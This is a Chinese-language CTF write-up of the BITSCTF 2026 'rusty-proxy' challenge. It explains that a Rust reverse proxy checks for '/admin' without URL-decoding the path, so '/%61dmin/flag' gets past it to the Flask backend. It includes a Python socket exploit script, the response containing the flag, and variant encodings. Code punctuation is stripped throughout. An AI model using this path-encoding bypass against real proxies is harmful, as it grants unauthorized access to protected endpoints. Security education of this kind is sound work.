【CTF-WEB-代码审计】URL编码绕过路经检查访问flag页面,admin编码为%61%64min

发布时间:2026/7/23 20:01:53
【CTF-WEB-代码审计】URL编码绕过路经检查访问flag页面,admin编码为%61%64min 题目BITSCTF 2026\题目\WEB\rusty-proxyrusty-proxyI just vibecoded a highly secure reverse proxy using rust, I hope it works properly.http://chals.bitskrieg.in:25001解题思路访问网站http://chals.bitskrieg.in:25001http://chals.bitskrieg.in:25001/api/status问题分析题目要求我们分析一个用Rust编写的反向代理服务器rusty-proxy并找到其中的安全漏洞从而获取后端服务器的flag。提供的代码结构如下proxy/src/main.rsRust编写的反向代理服务器代码backend/server.pyPython编写的后端服务器代码docker-compose.ymlDocker Compose配置文件代码审计1. 后端服务器分析首先查看后端服务器的代码backend/server.pyfromflaskimportFlask,jsonify,requestimportcheroot.wsgiimportos appFlask(__name__)FLAGos.getenv(FLAG,BITSCTF{fake_flag})app.route(/,methods[GET,POST])defindex():ifrequest.methodPOST:_request.get_data()returnjsonify({version:1.0.0,endpoints:[/,/api/status],})app.route(/api/status)defstatus():returnjsonify({status:running,uptime:operational,})app.route(/admin/flag)defvault():returnjsonify({flag:FLAG})if__name____main__:bind_addr(0.0.0.0,8080)servercheroot.wsgi.Server(bind_addr,app)print(fBackend running on{bind_addr[0]}:{bind_addr[1]})try:server.start()exceptKeyboardInterrupt:server.stop()从后端代码可以看出后端是一个Flask应用运行在8080端口提供了三个端点/返回版本信息和可用端点/api/status返回服务器状态/admin/flag返回flag这是我们的目标直接访问/admin/flag无法获取到flag2. 反向代理服务器分析接下来查看反向代理服务器的代码proxy/src/main.rs2.1 路径检查函数fnis_path_allowed(path:str)-bool{letnormalizedpath.to_lowercase();ifnormalized.starts_with(/admin){returnfalse;}true}这个函数负责检查请求路径是否允许访问。它将路径转换为小写然后检查是否以/admin开头如果是则返回false拒绝访问。2.2 请求解析函数asyncfnparse_request(reader:mutBufReadertokio::io::ReadHalfTcpStream,)-ResultOptionRequestMeta,staticstr{// ... 解析请求行 ...lettrimmed_linerequest_line.trim_end().to_string();letparts:Vecstrtrimmed_line.splitn(3, ).collect();ifparts.len()!3{returnErr(malformed request-line);}letmethodparts[0].to_string();letpathparts[1].to_string();letversionparts[2].to_string();// ... 解析请求头 ...Ok(Some(RequestMeta{method,path,version,headers,is_chunked,content_length,client_wants_close,}))}这个函数负责解析HTTP请求从请求行中提取方法、路径和版本。注意它直接将路径存储到RequestMeta结构中没有进行任何URL解码。2.3 客户端处理函数asyncfnhandle_client(client:TcpStream,pool:ArcConnPool){let(read_half,mutwrite_half)tokio::io::split(client);letmutreaderBufReader::new(read_half);loop{letmetamatchparse_request(mutreader).await{Ok(Some(m))m,Ok(None)break,Err(msg){let_send_error(mutwrite_half,400 Bad Request,msg).await;break;}};letclose_aftermeta.client_wants_close;if!is_path_allowed(meta.path){let_send_error(mutwrite_half,403 Forbidden,Access denied.\n).await;break;}// ... 连接后端服务器 ...letmutheadformat!({} {} {}\r\n,meta.method,meta.path,meta.version);for(k,v)inmeta.headers{head.push_str(format!({}: {}\r\n,k,v));}head.push_str(\r\n);// ... 发送请求到后端服务器 ...}}这个函数负责处理客户端请求解析HTTP请求获取请求元数据调用is_path_allowed函数检查路径是否允许访问如果允许访问将原始路径传递给后端服务器漏洞发现在分析代码后我发现了一个潜在的安全漏洞is_path_allowed函数没有对路径进行URL解码。这意味着如果路径是URL编码的比如/%61dmin/flag那么path.to_lowercase()会将其转换为/%61dmin/flag因为URL编码的部分是大写的然后检查是否以/admin开头这显然不会匹配所以会返回true允许访问代理服务器会将原始的URL编码路径传递给后端服务器后端服务器Flask应用会自动对URL进行解码将其解码为/admin/flag然后返回flag漏洞利用测试1使用URL编码的路径代码访问importsocket# 创建socket连接socksocket.socket(socket.AF_INET,socket.SOCK_STREAM)sock.settimeout(5)sock.connect((chals.bitskrieg.in,25001))# 构建HTTP请求使用URL编码的路径# %61 是字符 a 的URL编码requestbGET /%61dmin/flag HTTP/1.1\r\nrequestbHost: chals.bitskrieg.in:25001\r\nrequestbConnection: close\r\nrequestb\r\n# 发送请求sock.sendall(request)# 接收响应responsebwhileTrue:try:datasock.recv(1024)ifnotdata:breakresponsedataexceptsocket.timeout:break# 关闭连接sock.close()print(response.decode())测试结果HTTP/1.1 200 OK Content-Type: application/json Content-Length: 55 Date: Sun, 22 Feb 2026 07:08:01 GMT Server: Cheroot/11.1.2 {flag:BITSCTF{tr4il3r_p4r51n6_15_p41n_1n_7h3_4hh}}成功获取到了flag直接访问http://chals.bitskrieg.in:25001/%61dmin/flag其他测试我还测试了其他几种URL编码方式都成功绕过了路径检查/%61%64min/flag只编码前两个字符/%61%64%6d%69%6e/flag编码整个admin字符串所有测试都成功获取到了flag。漏洞原理输入处理不当is_path_allowed函数没有对输入路径进行URL解码直接使用原始路径进行检查。信任用户输入函数信任用户提供的路径没有进行任何验证或转换。后端自动解码后端服务器Flask应用会自动对URL进行解码使得编码后的路径能够被正确解析。总结通过代码审计我发现了一个URL编码绕过漏洞利用这个漏洞成功获取了后端服务器的flag。这个漏洞的根本原因是is_path_allowed函数没有对路径进行URL解码导致攻击者可以通过发送URL编码的路径来绕过路径检查。最终flagBITSCTF{tr4il3r_p4r51n6_15_p41n_1n_7h3_4hh}